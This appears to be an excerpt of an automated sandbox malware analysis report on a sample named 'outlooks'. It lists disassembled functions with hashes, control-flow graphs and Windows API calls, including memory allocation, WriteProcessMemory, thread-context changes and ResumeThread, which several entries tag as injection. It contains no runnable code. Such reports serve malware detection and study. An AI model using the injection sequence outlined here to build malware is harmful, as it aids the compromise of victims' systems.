                                                                            • Source File: 0000000F.00000002.1682379652.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_32f0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: dd693fcbb26c6eda268fe1c90d8d9803dccedfe86fefc419dffd0624afd299f1
                                                                            • Instruction ID: 23e67580162063ff204f0611c7e14dd1fc0b51cc09d2743246704b753731dc21
                                                                            • Opcode Fuzzy Hash: dd693fcbb26c6eda268fe1c90d8d9803dccedfe86fefc419dffd0624afd299f1
                                                                            • Instruction Fuzzy Hash: A141DDB0C00719DFDB24DFA9C844B9EFBB2BF49704F24816AD508AB251DB756946CF90
                                                                            Function 032F79DC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 131 32f79dc-32f8f01 CreateActCtxA 134 32f8f0a-32f8f64 131->134 135 32f8f03-32f8f09 131->135 142 32f8f66-32f8f69 134->142 143 32f8f73-32f8f77 134->143 135->134 142->143 144 32f8f79-32f8f85 143->144 145 32f8f88 143->145 144->145 147 32f8f89 145->147 147->147
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 032F8EF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1682379652.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_32f0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 97d40da132377033d8312140b84f28deca352e66831bc9ae017aa65b7670690e
                                                                            • Instruction ID: 4da36a5c89c2bb0915a722fd16b00b406f7b78feb41aab1abae6b01fb6c32acd
                                                                            • Opcode Fuzzy Hash: 97d40da132377033d8312140b84f28deca352e66831bc9ae017aa65b7670690e
                                                                            • Instruction Fuzzy Hash: 4841EFB0C10719DFDB24DFA9C844B9EFBB2BF48704F24816AD508AB251DBB56946CF90
                                                                            Function 0886B1D1 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 148 886b1d1-886b226 151 886b236-886b275 WriteProcessMemory 148->151 152 886b228-886b234 148->152 154 886b277-886b27d 151->154 155 886b27e-886b2ae 151->155 152->151 154->155
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0886B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: e040a4ffcc5fe98f266dbc938096d5751616c2ba44d9ca71fa1b42def92e8cbc
                                                                            • Instruction ID: 90f3a8da16902980070063f05187f3e8fabf2c2b4df6fc3ebde77e426d2ada46
                                                                            • Opcode Fuzzy Hash: e040a4ffcc5fe98f266dbc938096d5751616c2ba44d9ca71fa1b42def92e8cbc
                                                                            • Instruction Fuzzy Hash: B12135719003599FDB10CFAAC885BEEBBF5FF48324F14842AE919A7240D7789950CBA4
                                                                            Function 0886B1D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 159 886b1d8-886b226 161 886b236-886b275 WriteProcessMemory 159->161 162 886b228-886b234 159->162 164 886b277-886b27d 161->164 165 886b27e-886b2ae 161->165 162->161 164->165
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0886B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 116816eb3f9bc2031a1f1e927da04b98404967e7292b6416c5ebe9dd4263d74c
                                                                            • Instruction ID: fc214dc34b0b5a564a9d2a83d75c2b5c0af3522f74005b5807e23b030a91f1c0
                                                                            • Opcode Fuzzy Hash: 116816eb3f9bc2031a1f1e927da04b98404967e7292b6416c5ebe9dd4263d74c
                                                                            • Instruction Fuzzy Hash: 352125719003499FDB10CFAAC885BDEBBF5FF48324F50842AE919A7240D7789954CBA4
                                                                            Function 0886AC30 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 169 886ac30-886ac83 171 886ac85-886ac91 169->171 172 886ac93-886acc3 Wow64SetThreadContext 169->172 171->172 174 886acc5-886accb 172->174 175 886accc-886acfc 172->175 174->175
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0886ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: cb990175764697df387a71e1a73b838b73ac004e2e09b2ebcfe9f58125fa1741
                                                                            • Instruction ID: 2474dffdc171d17d4d66fabc6e979223fa75fb0afd5b81e0de6ff4ede3680f28
                                                                            • Opcode Fuzzy Hash: cb990175764697df387a71e1a73b838b73ac004e2e09b2ebcfe9f58125fa1741
                                                                            • Instruction Fuzzy Hash: D2215471D003098FDB14CFAAC885BEEBBF5EF48220F14842AD519A7340CB789A45CFA0
                                                                            Function 0886B2C1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 179 886b2c1-886b355 ReadProcessMemory 183 886b357-886b35d 179->183 184 886b35e-886b38e 179->184 183->184
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0886B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 3c62a8836cf4683c8c983070f814c1d2f54c7d65ae6d99743c8083f5a9c55be0
                                                                            • Instruction ID: 7b93e470869b35f235dcdc32577fcb71150176c834894ff08b29a5d3904341a9
                                                                            • Opcode Fuzzy Hash: 3c62a8836cf4683c8c983070f814c1d2f54c7d65ae6d99743c8083f5a9c55be0
                                                                            • Instruction Fuzzy Hash: 1E2136718003599FDB10CFAAC880BEEBBF5FF48320F148429E559A7240C7399551CBA1
                                                                            Function 0886B100 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 188 886b100-886b193 VirtualAllocEx 191 886b195-886b19b 188->191 192 886b19c-886b1c1 188->192 191->192
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0886B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 089c192067216493fd107748cb96a98c192159cb235647be0b95f2783ec1711e
                                                                            • Instruction ID: 56b733c9dd52286993fba3cc7f15a439067342dcf369d6105ac2e654859cc998
                                                                            • Opcode Fuzzy Hash: 089c192067216493fd107748cb96a98c192159cb235647be0b95f2783ec1711e
                                                                            • Instruction Fuzzy Hash: 642156728002889FDB21CFAAD844BEEBFF5FF88324F148819E515A7250C7399911CFA0
                                                                            Function 0886AC38 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 196 886ac38-886ac83 198 886ac85-886ac91 196->198 199 886ac93-886acc3 Wow64SetThreadContext 196->199 198->199 201 886acc5-886accb 199->201 202 886accc-886acfc 199->202 201->202
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0886ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: b907a75b0b0d23e67abdb9410867ed8e9bbb4023207aaf0c9d101061b14c6ab1
                                                                            • Instruction ID: 0b92dcd45d19cdf7d59906c7188edc3fc66925ef2c1fe8fa5bb14631fcc8de2b
                                                                            • Opcode Fuzzy Hash: b907a75b0b0d23e67abdb9410867ed8e9bbb4023207aaf0c9d101061b14c6ab1
                                                                            • Instruction Fuzzy Hash: F1211571D003098FDB14DFAAC885BEEBBF5EF48324F14842AD519A7240CB78A945CFA4
                                                                            Function 0886B2C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 206 886b2c8-886b355 ReadProcessMemory 209 886b357-886b35d 206->209 210 886b35e-886b38e 206->210 209->210
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0886B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 7fddd316822043601b060e13daa42480b16ffc696711c8b2547e21a671ab8c6e
                                                                            • Instruction ID: 9c0866c13ebd8d8f7569989da184e0cd6a079cc9eda45db54932b41e45efabee
                                                                            • Opcode Fuzzy Hash: 7fddd316822043601b060e13daa42480b16ffc696711c8b2547e21a671ab8c6e
                                                                            • Instruction Fuzzy Hash: F32128719003499FDB10CFAAC844BDEBBF5FF48320F108429E519A7240C7799550CBA4
                                                                            Function 0886AB80 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 214 886ab80-886abf7 ResumeThread 218 886ac00-886ac25 214->218 219 886abf9-886abff 214->219 219->218
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: ab6b336361b0d38da5d4d2a377ebce487c95f66ac7c3dedd2bd04ce537f42ba7
                                                                            • Instruction ID: 6673c47bed914e8358cc9717f391fc883119a0b8b4ec7131e431b51f50da5439
                                                                            • Opcode Fuzzy Hash: ab6b336361b0d38da5d4d2a377ebce487c95f66ac7c3dedd2bd04ce537f42ba7
                                                                            • Instruction Fuzzy Hash: 44115B718003588FDB14DFAAC8457EEFBF5EF49724F248819D519A7240C779A940CFA5
                                                                            Function 0886B118 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 223 886b118-886b193 VirtualAllocEx 226 886b195-886b19b 223->226 227 886b19c-886b1c1 223->227 226->227
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0886B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 5580e40f0c3926cdd8b3bfc9138c51a94f6033102f438398a9e649b2ad2ce2c8
                                                                            • Instruction ID: 099cc174231d7ebb12519ece395d76c7516fdd78ea59657d3d4c07f091ca0b1e
                                                                            • Opcode Fuzzy Hash: 5580e40f0c3926cdd8b3bfc9138c51a94f6033102f438398a9e649b2ad2ce2c8
                                                                            • Instruction Fuzzy Hash: 0F1126718003499FDB10DFAAC844BDEBBF5EF48724F148819E519A7250C779A950CFA0
                                                                            Function 0886AB88 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 231 886ab88-886abf7 ResumeThread 234 886ac00-886ac25 231->234 235 886abf9-886abff 231->235 235->234
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 9d739a91614a821fb64952b64f4285617c77b5dc93f114d25d90d059ded52b41
                                                                            • Instruction ID: d44f4baae3233f9e9313084c48d800476add3a563d4e5a70d01548059ed8797d
                                                                            • Opcode Fuzzy Hash: 9d739a91614a821fb64952b64f4285617c77b5dc93f114d25d90d059ded52b41
                                                                            • Instruction Fuzzy Hash: A1113A719003488FDB14DFAAC8447DEFBF5EF88724F248419D519A7240CB79A544CFA4
                                                                            Function 0886ADF4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0886E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 560c69ff5d5c5ebfede3f48697027b56e61bb84e5b80f4880903e223193532be
                                                                            • Instruction ID: 8a9d38e3dcb96c277e9c566f3502c35f063f85e4d2f362712376a8e9112a1340
                                                                            • Opcode Fuzzy Hash: 560c69ff5d5c5ebfede3f48697027b56e61bb84e5b80f4880903e223193532be
                                                                            • Instruction Fuzzy Hash: DF1103B5800348DFDB10DF9AC888BDEBBF8EB48324F208419E518A7600D379A954CFA1
                                                                            Function 032FEBD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 239 32febd8-32fec18 240 32fec1a-32fec1d 239->240 241 32fec20-32fec4b GetModuleHandleW 239->241 240->241 242 32fec4d-32fec53 241->242 243 32fec54-32fec68 241->243 242->243
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 032FEC3E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1682379652.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_32f0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 14dea253ad43db75919fb6965f126e1a71579b68cfb44d15e79ad4eb01507447
                                                                            • Instruction ID: 20d4bc500929d7e9c1642471ffb776b9e38f8a2df700787e62877af2fea2b2b4
                                                                            • Opcode Fuzzy Hash: 14dea253ad43db75919fb6965f126e1a71579b68cfb44d15e79ad4eb01507447
                                                                            • Instruction Fuzzy Hash: 37110FB5C002498FDB10CF9AC844ADEFBF5EB88324F15842AD519A7210C379A545CFA1
                                                                            Function 0886E500 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0886E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 625d2da82f536ea6f7d2cb4f39564d7c00331078de6267443798d21802e73994
                                                                            • Instruction ID: 1c4b223f78f2efb8def0bda9a624051ae2609372d6eeb1ccc2761737848141d3
                                                                            • Opcode Fuzzy Hash: 625d2da82f536ea6f7d2cb4f39564d7c00331078de6267443798d21802e73994
                                                                            • Instruction Fuzzy Hash: 2F1136B5800248CFDB10DF9AD488BDEBFF4FB48320F208459E514A7200C379A944CFA1
                                                                            Function 0307D01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1678049769.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_307d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8c618966d0574d63f7421dbb26b386046286fa1a9d52888cfdf5e68a9439f937
                                                                            • Instruction ID: 5f9dc29730e2944b5cfdcfdc015f407d8aca263f44973af49bdc5bfe50dceeeb
                                                                            • Opcode Fuzzy Hash: 8c618966d0574d63f7421dbb26b386046286fa1a9d52888cfdf5e68a9439f937
                                                                            • Instruction Fuzzy Hash: C22104B5A04344DFDB14DF10D9C4B16BBA5FF84314F24C9ADD84A4B256C33AD447CAA6
                                                                            Function 0307D006 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1678049769.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_307d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93645d1f2ab4847bf590bcff4a7d134303098b4301fe01c62915314be4a3bc1d
                                                                            • Instruction ID: 8e26bcacbe2e82459b4da98813cbb4863257c2c3ece0f3fe729df0507fac6165
                                                                            • Opcode Fuzzy Hash: 93645d1f2ab4847bf590bcff4a7d134303098b4301fe01c62915314be4a3bc1d
                                                                            • Instruction Fuzzy Hash: FF2184755093808FCB12CF24D994715BFB1EF46214F28C5DAD8498F6A7C33AD44ACBA2

                                                                            Execution Graph

                                                                            Execution Coverage:10%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:117
                                                                            Total number of Limit Nodes:13
                                                                            execution_graph 23838 1936540 23839 1936586 23838->23839 23844 1936780 23839->23844 23852 193670f 23839->23852 23857 1936720 23839->23857 23840 1936673 23845 1936783 DuplicateHandle 23844->23845 23846 193670f 23844->23846 23848 193681e 23845->23848 23851 193669f 23846->23851 23860 193611c 23846->23860 23848->23840 23851->23840 23853 1936713 23852->23853 23854 193669f 23852->23854 23855 193611c DuplicateHandle 23853->23855 23854->23840 23856 193674e 23855->23856 23856->23840 23858 193611c DuplicateHandle 23857->23858 23859 193674e 23858->23859 23859->23840 23861 1936788 DuplicateHandle 23860->23861 23862 193674e 23861->23862 23862->23840 23863 1934668 23864 1934676 23863->23864 23869 1936de0 23864->23869 23867 1934704 23870 1936e05 23869->23870 23878 1936ef0 23870->23878 23882 1936edf 23870->23882 23871 19346e9 23874 193421c 23871->23874 23875 1934227 23874->23875 23890 1938560 23875->23890 23877 1938806 23877->23867 23880 1936f17 23878->23880 23879 1936ff4 23879->23879 23880->23879 23886 1936414 23880->23886 23883 1936f17 23882->23883 23884 1936414 CreateActCtxA 23883->23884 23885 1936ff4 23883->23885 23884->23885 23887 1937370 CreateActCtxA 23886->23887 23889 1937433 23887->23889 23889->23889 23891 193856b 23890->23891 23894 1938580 23891->23894 23893 19388dd 23893->23877 23895 193858b 23894->23895 23898 19385b0 23895->23898 23897 19389ba 23897->23893 23899 19385bb 23898->23899 23902 19385e0 23899->23902 23901 1938aad 23901->23897 23904 19385eb 23902->23904 23903 1939ed1 23903->23901 23905 1939e93 23904->23905 23909 193bed1 23904->23909 23915 193bbc8 23904->23915 23905->23903 23919 193df70 23905->23919 23910 193beda 23909->23910 23912 193be91 23909->23912 23923 193bf08 23910->23923 23927 193bef8 23910->23927 23911 193bee6 23911->23905 23912->23905 23916 193bbf3 23915->23916 23962 1939bbc 23916->23962 23918 193bc0b 23918->23905 23920 193df91 23919->23920 23921 193dfb5 23920->23921 23969 193e120 23920->23969 23921->23903 23931 193c000 23923->23931 23941 193bff0 23923->23941 23924 193bf17 23924->23911 23928 193bf17 23927->23928 23929 193c000 2 API calls 23927->23929 23930 193bff0 2 API calls 23927->23930 23928->23911 23929->23928 23930->23928 23932 193c011 23931->23932 23935 193c034 23931->23935 23951 193af60 23932->23951 23935->23924 23936 193c02c 23936->23935 23937 193c238 GetModuleHandleW 23936->23937 23938 193c265 23937->23938 23938->23924 23942 193c011 23941->23942 23946 193c034 23941->23946 23943 193af60 GetModuleHandleW 23942->23943 23944 193c01c 23943->23944 23944->23946 23949 193c689 GetModuleHandleW 23944->23949 23950 193c698 GetModuleHandleW 23944->23950 23945 193c02c 23945->23946 23947 193c238 GetModuleHandleW 23945->23947 23946->23924 23948 193c265 23947->23948 23948->23924 23949->23945 23950->23945 23952 193c1f0 GetModuleHandleW 23951->23952 23954 193c01c 23952->23954 23954->23935 23955 193c689 23954->23955 23959 193c698 23954->23959 23956 193c698 23955->23956 23957 193af60 GetModuleHandleW 23956->23957 23958 193c6ac 23957->23958 23958->23936 23960 193af60 GetModuleHandleW 23959->23960 23961 193c6ac 23960->23961 23961->23936 23963 1939bc7 23962->23963 23965 1939e93 23963->23965 23967 193bed1 3 API calls 23963->23967 23968 193bbc8 4 API calls 23963->23968 23964 1939ed1 23964->23918 23965->23964 23966 193df70 4 API calls 23965->23966 23966->23964 23967->23965 23968->23965 23970 193e12d 23969->23970 23971 193e166 23970->23971 23973 193c464 23970->23973 23971->23921 23974 193c46f 23973->23974 23975 193e1d8 23974->23975 23977 193c498 23974->23977 23978 193c4a3 23977->23978 23979 19385e0 4 API calls 23978->23979 23980 193e247 23979->23980 23985 193e2c0 23980->23985 23981 193e256 23982 193c4a8 GetModuleHandleW GetModuleHandleW GetModuleHandleW KiUserCallbackDispatcher 23981->23982 23983 193e270 23982->23983 23983->23975 23986 193e2ee 23985->23986 23987 193e3ba KiUserCallbackDispatcher 23986->23987 23988 193e3bf 23986->23988 23987->23988

                                                                            Executed Functions

                                                                            Function 082AB2C0 Relevance: 1.0, Instructions: 1017COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d8034836f0a214b0d1f7caa6cef171db7aed9b442c93c1325c985e7ac0fe410
                                                                            • Instruction ID: 36f45305ab3d6513aba09922ec6596bf6438202b717f6a49efbb8b258d503872
                                                                            • Opcode Fuzzy Hash: 5d8034836f0a214b0d1f7caa6cef171db7aed9b442c93c1325c985e7ac0fe410
                                                                            • Instruction Fuzzy Hash: BB82BD70B107428FDB19CB68C49466EBBF6BF88311F14892DE54ADB791CB34E942CB81
                                                                            Function 0193C000 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 4e13af1a00e98a826b6b4272723f91786bdac8e6e73e32a161b100aa9e0b2a49
                                                                            • Instruction ID: 6127e0a3962cfacd2b4bb05da939dc02ffc1a3b76ffab579320d22ce416351c1
                                                                            • Opcode Fuzzy Hash: 4e13af1a00e98a826b6b4272723f91786bdac8e6e73e32a161b100aa9e0b2a49
                                                                            • Instruction Fuzzy Hash: 23716AB0A00B058FEB24DF6AD44475ABBF5FF88300F10892ED48AE7A50DB75E845CB91
                                                                            Function 082A1C9F Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 57 82a1c9f-82a1ca3 58 82a1d0f-82a1d13 57->58 59 82a1ca5-82a1cb3 57->59 60 82a1d7f-82a1d8e 58->60 61 82a1d15-82a1d16 58->61 66 82a1d1f-82a1d23 59->66 67 82a1cb5-82a1cb6 59->67 68 82a1d8f-82a1d97 60->68 62 82a1d1a-82a1d1e 61->62 63 82a1d18 61->63 62->66 63->62 66->68 72 82a1d25-82a1d29 66->72 70 82a1cb8-82a1cbe 67->70 71 82a1cc6-82a1ccb 67->71 85 82a1d9b 68->85 73 82a1ccd-82a1cd1 70->73 79 82a1cc0-82a1cc5 70->79 71->73 74 82a1d37-82a1d41 71->74 75 82a1d2b-82a1d36 72->75 73->58 74->75 75->74 79->71 86 82a1d9d-82a1d9e 85->86 87 82a1e07-82a1e0b 85->87 91 82a1dae-82a1db1 86->91 92 82a1da0 86->92 88 82a1e0d-82a1e0e 87->88 89 82a1e77-82a1e7b 87->89 93 82a1e0f-82a1e11 88->93 95 82a1e7d-82a1e86 89->95 96 82a1ee7-82a1eee 89->96 91->85 94 82a1db3 91->94 103 82a1da3 92->103 97 82a1e13-82a1e1b 93->97 98 82a1e30-82a1e36 93->98 99 82a1e1f-82a1e23 94->99 100 82a1db5-82a1db9 94->100 101 82a1e96 95->101 102 82a1e87-82a1e8e 95->102 97->102 106 82a1e1d-82a1e1e 97->106 115 82a1e37-82a1e4b 98->115 117 82a1e8f-82a1e95 99->117 118 82a1e25-82a1e26 99->118 100->103 107 82a1dbb 100->107 105 82a1e97-82a1e99 101->105 116 82a1e9d-82a1ea1 102->116 102->117 103->93 104 82a1da5-82a1da6 103->104 104->100 109 82a1da8-82a1dad 104->109 110 82a1e9a-82a1e9c 105->110 106->99 112 82a1dbd-82a1dcb 107->112 113 82a1e27-82a1e2b 107->113 109->91 110->116 112->115 119 82a1dcd-82a1de3 112->119 113->105 128 82a1e2d-82a1e2e 113->128 137 82a1e4d-82a1e4e 115->137 138 82a1eb7-82a1eb9 115->138 121 82a1ea2-82a1ea3 116->121 117->101 118->113 143 82a1e4f-82a1e5b 119->143 146 82a1de5-82a1dee 119->146 126 82a1f0f-82a1f13 121->126 127 82a1ea4-82a1eae 121->127 129 82a1f7f-82a1f8e 126->129 130 82a1f15-82a1f18 126->130 131 82a1eaf-82a1eb1 127->131 128->98 133 82a1f8f-82a1fe9 129->133 130->131 135 82a1f1a 130->135 131->110 136 82a1eb3 131->136 165 82a1feb-82a2007 133->165 166 82a200c-82a20b1 call 82a0788 